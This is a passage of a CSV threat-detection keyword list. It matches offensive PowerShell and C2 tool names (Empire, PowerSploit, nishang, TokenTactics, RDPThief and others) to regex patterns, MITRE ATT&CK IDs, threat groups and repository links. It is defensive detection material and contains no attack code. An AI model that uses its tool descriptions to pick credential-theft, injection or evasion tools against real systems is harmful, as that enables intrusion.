APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49388" "*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49389" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49390" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - 
TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49391" "*Invoke-Psnmap*",".{0,1000}Invoke\-Psnmap.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","49392" "*Invoke-PSObfuscation*",".{0,1000}Invoke\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","49393" "*Invoke-PSRemoting*",".{0,1000}Invoke\-PSRemoting.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49394" "*Invoke-PsUACme -Method *",".{0,1000}Invoke\-PsUACme\s\-Method\s.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","49395" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","49396" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49397" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49398" "*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49399" "*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49400" "*Invoke-PuttyCreds*",".{0,1000}Invoke\-PuttyCreds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49401" "*Invoke-Pwds.ps1*",".{0,1000}Invoke\-Pwds\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","49402" "*Invoke-RBDC*",".{0,1000}Invoke\-RBDC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49403" "*Invoke-RBDC-over-DAVRPC*",".{0,1000}Invoke\-RBDC\-over\-DAVRPC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49404" "*Invoke-RDPThief *",".{0,1000}Invoke\-RDPThief\s.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","49406" "*Invoke-RDPThief.ps1*",".{0,1000}Invoke\-RDPThief\.ps1.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","49407" 
"*Invoke-RDPwrap.ps1*",".{0,1000}Invoke\-RDPwrap\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49408" "*Invoke-ReadC2Output*",".{0,1000}Invoke\-ReadC2Output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49409" "*Invoke-Recon *",".{0,1000}Invoke\-Recon\s.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","0","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","49410" "*invoke-reflectivedllinjection-ps1*",".{0,1000}invoke\-reflectivedllinjection\-ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49411" "*InvokeReflectivePEInjection*",".{0,1000}InvokeReflectivePEInjection.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","49412" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49413" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ReflectivePEInjection.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49414" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","49415" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49416" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49417" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49418" "*Invoke-ReflectivePEInjection.*",".{0,1000}Invoke\-ReflectivePEInjection\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49419" 
"*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","49420" "*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","49421" "*Invoke-RefreshAzureAppTokens -ClientId * -ClientSecret *",".{0,1000}Invoke\-RefreshAzureAppTokens\s\-ClientId\s.{0,1000}\s\-ClientSecret\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49422" "*Invoke-RefreshGraphTokens*",".{0,1000}Invoke\-RefreshGraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Use a refresh token to obtain new access tokens","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49423" 
"*Invoke-RefreshToAzureCoreManagementToken *",".{0,1000}Invoke\-RefreshToAzureCoreManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49424" "*Invoke-RefreshToAzureManagementToken *",".{0,1000}Invoke\-RefreshToAzureManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49425" "*Invoke-RefreshToDODMSGraphToken *",".{0,1000}Invoke\-RefreshToDODMSGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49426" "*Invoke-RefreshToGraphToken *",".{0,1000}Invoke\-RefreshToGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49427" "*Invoke-RefreshToMAMToken *",".{0,1000}Invoke\-RefreshToMAMToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - 
T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49428" "*Invoke-RefreshToMSGraphToken *",".{0,1000}Invoke\-RefreshToMSGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49429" "*Invoke-RefreshToMSGraphToken -domain -ClientId *",".{0,1000}Invoke\-RefreshToMSGraphToken\s\-domain\s\-ClientId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49430" "*Invoke-RefreshToMSManageToken *",".{0,1000}Invoke\-RefreshToMSManageToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49431" "*Invoke-RefreshToMSTeamsToken *",".{0,1000}Invoke\-RefreshToMSTeamsToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49432" "*Invoke-RefreshToOfficeAppsToken 
*",".{0,1000}Invoke\-RefreshToOfficeAppsToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49433" "*Invoke-RefreshToOfficeManagementToken *",".{0,1000}Invoke\-RefreshToOfficeManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49434" "*Invoke-RefreshToOneDriveToken *",".{0,1000}Invoke\-RefreshToOneDriveToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49435" "*Invoke-RefreshToOutlookToken *",".{0,1000}Invoke\-RefreshToOutlookToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great 